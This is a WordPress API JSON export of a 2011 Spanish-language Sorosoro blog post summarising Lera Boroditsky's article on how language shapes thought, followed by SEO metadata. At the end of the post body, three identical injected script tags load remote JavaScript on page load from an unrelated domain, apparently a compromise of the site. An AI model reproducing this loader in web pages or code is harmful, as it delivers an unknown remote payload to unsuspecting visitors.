{"id":57680,"date":"2011-09-23T18:08:50","date_gmt":"2011-09-23T16:08:50","guid":{"rendered":"http:\/\/www.sorosoro.org\/?p=57680"},"modified":"2025-10-21T22:22:18","modified_gmt":"2025-10-21T20:22:18","slug":"setiembre-2011-un-articulo-en-la-revista-pour-la-science-titulado-la-lengua-forma-el-pensamiento","status":"publish","type":"post","link":"https:\/\/www.sorosoro.org\/es\/2011\/09\/setiembre-2011-un-articulo-en-la-revista-pour-la-science-titulado-la-lengua-forma-el-pensamiento\/","title":{"rendered":"Setiembre 2011: un art\u00edculo en la revista <i>Pour la science<\/i> titulado \u00ab La lengua forma el pensamiento\u00bb"},"content":{"rendered":"<p style=\"text-align: justify;\">El \u00faltimo n\u00famero de la revista <em>Pour la sience<\/em> propone en este mes de setiembre un art\u00edculo apasionante de <strong>Lera Boroditsky<\/strong>, profesora de psicolog\u00eda cognitiva en la Universidad de Stanford en California.<\/p>\n<p style=\"text-align: justify;\">Desde hace siglos, ella escribe \u00ab\u00a0se sospecha que lenguas diferentes pueden transmitir capacidades cognitivas distintas\u00bb y que \u00ablos hablantes de lenguas [pueden] pensar de manera diferida\u00bb. Hay que probarla\u2026<\/p>\n<p style=\"text-align: justify;\">Su equipo de investigaci\u00f3n se han acometido en ese asunto y han logrado demostrar que \u00ab<strong>la lengua forma ciertas caracter\u00edsticas fundamentales de la experiencia humana: los nombres, el espacio, el tiempo, la memoria y las relaciones con el pr\u00f3jimo<\/strong>\u00bb.<\/p>\n<p style=\"text-align: justify;\">Los ejemplos dados en los art\u00edculos son ricos en ense\u00f1anza. Se aprende, por ejemplo, que las <strong>se\u00f1ales espacio-temporales<\/strong> realmente son muy diferentes seg\u00fan la lengua que se habla y el medio ambiente en el que evoluciona.<\/p>\n<p style=\"text-align: justify;\">As\u00ed la autora relata una experiencia vivida en el momento de su encuentro con una ni\u00f1a aborigen de 5 a\u00f1os de edad, en el norte de Australia: \u00abCuando yo le ped\u00ed que me indique el norte, ella sin dudar apunt\u00f3 con el dedo hacia el norte. Y no se hab\u00eda equivocado. M\u00e1s tarde, en una sala de conferencias de la Universidad de Stanford en California, reiter\u00e9 mi solicitud ante los distinguidos investigadores, ganadores de medallas y de premios cient\u00edficos. Le ped\u00ed que cerrara los ojos (para que no puedan sentirse enga\u00f1ados) y se\u00f1ale con el dedo el norte. Muchos han rehusado, porque ellos ignoraban la respuesta. Los que aceptaron han tomado el tiempo para reflexionar y han se\u00f1alado diversas direcciones\u2026 He repetido esta experiencia en Harvard y en Princeton, as\u00ed como en Mosc\u00fa, Londres y Pekin. He obtenido los mismos resultados\u00bb<\/p>\n<p style=\"text-align: justify;\">Y se descubre as\u00ed que en ciertas lenguas abor\u00edgenes, las palabras izquierda y derecha no existen. Todo est\u00e1 situado seg\u00fan los puntos cardinales, incluso las peque\u00f1as cosas de lo cotidiano: \u00abla tasa est\u00e1 al sur-este del plato\u00bb o \u00abel muchacho que se encuentra al sur de Mar\u00eda es mi hermano.\u00bb<\/p>\n<p style=\"text-align: justify;\">La autora da otro ejemplo, el de la expresi\u00f3n del <strong>tiempo<\/strong>, es decir, el pasado, el presente y el futuro: \u00ablos hablantes angl\u00f3fonos desplazan inconscientemente su cuerpo hacia delante cuando piensan en el futuro, y hacia atr\u00e1s cuando piensan en el pasado. Pero en aimara, una lengua hablada en los Andes se dice que el pasado est\u00e1 delante y el futuro, detr\u00e1s. \u00bb<\/p>\n<p style=\"text-align: justify;\">Ella tambi\u00e9n cita el <strong>modo de calcular<\/strong>: los ni\u00f1os chinos, hablantes del mandar\u00edn, aprenden muy r\u00e1pido a contar en base de 10 porque la estructura en sistema decimal es muy clara en su lengua, mientras que esta es muy irregular en ingl\u00e9s o en franc\u00e9s.<\/p>\n<p style=\"text-align: justify;\">Adem\u00e1s, la cuesti\u00f3n de <strong>g\u00e9nero<\/strong> est\u00e1 en el art\u00edculo\u2026 Por ejemplo, los ni\u00f1os toman conciencia de su g\u00e9nero, masculino o femenino, m\u00e1s temprano en hebreo que en ingl\u00e9s o en finland\u00e9s, porque la lengua hebraica subraya fuertemente el aspecto femenino o masculino de las palabras. La diferencia de aprendizaje es notoria porque los ni\u00f1os criados en una atmosfera donde se habla el hebreo integran la noci\u00f3n de g\u00e9nero  aproximadamente un a\u00f1o antes que los peque\u00f1os finlandeses.<\/p>\n<p style=\"text-align: justify;\">La conclusi\u00f3n de Lera Boroditsky es n\u00edtida: \u00ab\u00a0cada lengua aporta su \u00abestuche de herramientas\u00a0\u00bb cognitiva y contiene el conocimiento y la visi\u00f3n del mundo en una cultura desarrollados en el transcurso de varios millones de a\u00f1os. Ella es capaz de expresar una manera de percibir el mundo, de aprehenderlo, de proporcionarle una significaci\u00f3n; representa una gu\u00eda que los antecesores han desarrollado y perfeccionado. Las investigaciones sobre el modo en el que las lenguas habladas modelan el pensamiento permiten a los cient\u00edficos de descubrir como el hombre crea el conocimiento y construye la realidad.\u00bb<\/p>\n<p style=\"text-align: justify;\">Un credo que nos va bien. \u00a1A Sorosoro!<\/p>\n<p style=\"text-align: justify;\">\n<p style=\"text-align: justify;\">\n<p style=\"text-align: justify;\">Para leer el art\u00edculo en su totalidad\u00a0: en <a href=\"http:\/\/www.scientificamerican.com\/article.cfm?id=how-language-shapes-thought\" target=\"_blank\">ingl\u00e9s<\/a>, en <a href=\"http:\/\/www.pourlascience.fr\/ewb_pages\/f\/fiche-article-la-langue-faconne-la-pensee-27831.php\" target=\"_blank\">franc\u00e9s<\/a>, en <a href=\"http:\/\/www.investigacionyciencia.es\/03065433000686\/Lenguaje_y_pensamiento.htm\" target=\"_blank\">espa\u00f1ol<\/a><\/p>\n<p style=\"text-align: justify;\">\n<p><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>El \u00faltimo n\u00famero de la revista Pour la sience propone en este mes de setiembre un art\u00edculo apasionante de Lera Boroditsky, profesora de psicolog\u00eda cognitiva en la Universidad de Stanford en California. Desde hace siglos, ella escribe \u00ab\u00a0se sospecha que lenguas diferentes pueden transmitir capacidades cognitivas distintas\u00bb y que \u00ablos hablantes de lenguas [pueden] pensar [&hellip;]<\/p>\n","protected":false},"author":18,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-57680","post","type-post","status-publish","format-standard","hentry","category-noticias"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.0 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Setiembre 2011: un art\u00edculo en la revista Pour la science titulado \u00ab La lengua forma el pensamiento\u00bb - Sorosoro<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.sorosoro.org\/es\/2011\/09\/setiembre-2011-un-articulo-en-la-revista-pour-la-science-titulado-la-lengua-forma-el-pensamiento\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Setiembre 2011: un art\u00edculo en la revista Pour la science titulado \u00ab La lengua forma el pensamiento\u00bb - Sorosoro\" \/>\n<meta property=\"og:description\" content=\"El \u00faltimo n\u00famero de la revista Pour la sience propone en este mes de setiembre un art\u00edculo apasionante de Lera Boroditsky, profesora de psicolog\u00eda cognitiva en la Universidad de Stanford en California. Desde hace siglos, ella escribe \u00ab\u00a0se sospecha que lenguas diferentes pueden transmitir capacidades cognitivas distintas\u00bb y que \u00ablos hablantes de lenguas [pueden] pensar [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.sorosoro.org\/es\/2011\/09\/setiembre-2011-un-articulo-en-la-revista-pour-la-science-titulado-la-lengua-forma-el-pensamiento\/\" \/>\n<meta property=\"og:site_name\" content=\"Sorosoro\" \/>\n<meta property=\"article:published_time\" content=\"2011-09-23T16:08:50+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-10-21T20:22:18+00:00\" \/>\n<meta name=\"author\" content=\"Michel.Lemee\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Michel.Lemee\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tiempo de lectura\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/09\/setiembre-2011-un-articulo-en-la-revista-pour-la-science-titulado-la-lengua-forma-el-pensamiento\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/09\/setiembre-2011-un-articulo-en-la-revista-pour-la-science-titulado-la-lengua-forma-el-pensamiento\/\"},\"author\":{\"name\":\"Michel.Lemee\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18\"},\"headline\":\"Setiembre 2011: un art\u00edculo en la revista Pour la science titulado \u00ab La lengua forma el pensamiento\u00bb\",\"datePublished\":\"2011-09-23T16:08:50+00:00\",\"dateModified\":\"2025-10-21T20:22:18+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/09\/setiembre-2011-un-articulo-en-la-revista-pour-la-science-titulado-la-lengua-forma-el-pensamiento\/\"},\"wordCount\":695,\"articleSection\":[\"Noticias sobre los idiomas en peligro\"],\"inLanguage\":\"es\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/09\/setiembre-2011-un-articulo-en-la-revista-pour-la-science-titulado-la-lengua-forma-el-pensamiento\/\",\"url\":\"https:\/\/www.sorosoro.org\/es\/2011\/09\/setiembre-2011-un-articulo-en-la-revista-pour-la-science-titulado-la-lengua-forma-el-pensamiento\/\",\"name\":\"Setiembre 2011: un art\u00edculo en la revista Pour la science titulado \u00ab La lengua forma el pensamiento\u00bb - Sorosoro\",\"isPartOf\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/#website\"},\"datePublished\":\"2011-09-23T16:08:50+00:00\",\"dateModified\":\"2025-10-21T20:22:18+00:00\",\"author\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/09\/setiembre-2011-un-articulo-en-la-revista-pour-la-science-titulado-la-lengua-forma-el-pensamiento\/#breadcrumb\"},\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.sorosoro.org\/es\/2011\/09\/setiembre-2011-un-articulo-en-la-revista-pour-la-science-titulado-la-lengua-forma-el-pensamiento\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/09\/setiembre-2011-un-articulo-en-la-revista-pour-la-science-titulado-la-lengua-forma-el-pensamiento\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/www.sorosoro.org\/es\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Setiembre 2011: un art\u00edculo en la revista Pour la science titulado \u00ab La lengua forma el pensamiento\u00bb\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/#website\",\"url\":\"https:\/\/www.sorosoro.org\/es\/\",\"name\":\"Sorosoro\",\"description\":\"Pour que vivent les langues du monde !\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.sorosoro.org\/es\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"es\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18\",\"name\":\"Michel.Lemee\",\"url\":\"https:\/\/www.sorosoro.org\/es\/author\/michel-lemee\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Setiembre 2011: un art\u00edculo en la revista Pour la science titulado \u00ab La lengua forma el pensamiento\u00bb - Sorosoro","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.sorosoro.org\/es\/2011\/09\/setiembre-2011-un-articulo-en-la-revista-pour-la-science-titulado-la-lengua-forma-el-pensamiento\/","og_locale":"es_ES","og_type":"article","og_title":"Setiembre 2011: un art\u00edculo en la revista Pour la science titulado \u00ab La lengua forma el pensamiento\u00bb - Sorosoro","og_description":"El \u00faltimo n\u00famero de la revista Pour la sience propone en este mes de setiembre un art\u00edculo apasionante de Lera Boroditsky, profesora de psicolog\u00eda cognitiva en la Universidad de Stanford en California. Desde hace siglos, ella escribe \u00ab\u00a0se sospecha que lenguas diferentes pueden transmitir capacidades cognitivas distintas\u00bb y que \u00ablos hablantes de lenguas [pueden] pensar [&hellip;]","og_url":"https:\/\/www.sorosoro.org\/es\/2011\/09\/setiembre-2011-un-articulo-en-la-revista-pour-la-science-titulado-la-lengua-forma-el-pensamiento\/","og_site_name":"Sorosoro","article_published_time":"2011-09-23T16:08:50+00:00","article_modified_time":"2025-10-21T20:22:18+00:00","author":"Michel.Lemee","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"Michel.Lemee","Tiempo de lectura":"3 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.sorosoro.org\/es\/2011\/09\/setiembre-2011-un-articulo-en-la-revista-pour-la-science-titulado-la-lengua-forma-el-pensamiento\/#article","isPartOf":{"@id":"https:\/\/www.sorosoro.org\/es\/2011\/09\/setiembre-2011-un-articulo-en-la-revista-pour-la-science-titulado-la-lengua-forma-el-pensamiento\/"},"author":{"name":"Michel.Lemee","@id":"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18"},"headline":"Setiembre 2011: un art\u00edculo en la revista Pour la science titulado \u00ab La lengua forma el pensamiento\u00bb","datePublished":"2011-09-23T16:08:50+00:00","dateModified":"2025-10-21T20:22:18+00:00","mainEntityOfPage":{"@id":"https:\/\/www.sorosoro.org\/es\/2011\/09\/setiembre-2011-un-articulo-en-la-revista-pour-la-science-titulado-la-lengua-forma-el-pensamiento\/"},"wordCount":695,"articleSection":["Noticias sobre los idiomas en peligro"],"inLanguage":"es"},{"@type":"WebPage","@id":"https:\/\/www.sorosoro.org\/es\/2011\/09\/setiembre-2011-un-articulo-en-la-revista-pour-la-science-titulado-la-lengua-forma-el-pensamiento\/","url":"https:\/\/www.sorosoro.org\/es\/2011\/09\/setiembre-2011-un-articulo-en-la-revista-pour-la-science-titulado-la-lengua-forma-el-pensamiento\/","name":"Setiembre 2011: un art\u00edculo en la revista Pour la science titulado \u00ab La lengua forma el pensamiento\u00bb - Sorosoro","isPartOf":{"@id":"https:\/\/www.sorosoro.org\/es\/#website"},"datePublished":"2011-09-23T16:08:50+00:00","dateModified":"2025-10-21T20:22:18+00:00","author":{"@id":"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18"},"breadcrumb":{"@id":"https:\/\/www.sorosoro.org\/es\/2011\/09\/setiembre-2011-un-articulo-en-la-revista-pour-la-science-titulado-la-lengua-forma-el-pensamiento\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.sorosoro.org\/es\/2011\/09\/setiembre-2011-un-articulo-en-la-revista-pour-la-science-titulado-la-lengua-forma-el-pensamiento\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.sorosoro.org\/es\/2011\/09\/setiembre-2011-un-articulo-en-la-revista-pour-la-science-titulado-la-lengua-forma-el-pensamiento\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.sorosoro.org\/es\/"},{"@type":"ListItem","position":2,"name":"Setiembre 2011: un art\u00edculo en la revista Pour la science titulado \u00ab La lengua forma el pensamiento\u00bb"}]},{"@type":"WebSite","@id":"https:\/\/www.sorosoro.org\/es\/#website","url":"https:\/\/www.sorosoro.org\/es\/","name":"Sorosoro","description":"Pour que vivent les langues du monde !","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.sorosoro.org\/es\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es"},{"@type":"Person","@id":"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18","name":"Michel.Lemee","url":"https:\/\/www.sorosoro.org\/es\/author\/michel-lemee\/"}]}},"_links":{"self":[{"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/posts\/57680","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/users\/18"}],"replies":[{"embeddable":true,"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/comments?post=57680"}],"version-history":[{"count":0,"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/posts\/57680\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/media?parent=57680"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/categories?post=57680"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/tags?post=57680"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}